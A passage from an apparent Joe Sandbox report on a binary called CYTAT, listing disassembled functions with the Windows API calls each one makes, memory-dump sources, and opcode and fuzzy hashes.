                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                • String ID:
                                                • API String ID: 2782032738-0
                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetParent.USER32(?), ref: 004503C8
                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Proc$Parent
                                                • String ID:
                                                • API String ID: 2351499541-0
                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                • _wcslen.LIBCMT ref: 00449519
                                                • _wcslen.LIBCMT ref: 00449526
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 2886238975-0
                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __setmode$DebugOutputString_fprintf
                                                • String ID:
                                                • API String ID: 1792727568-0
                                                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                • String ID: cdecl
                                                • API String ID: 3850814276-3896280584
                                                • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                • _memmove.LIBCMT ref: 0046D475
                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 2502553879-0
                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 00448C69
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
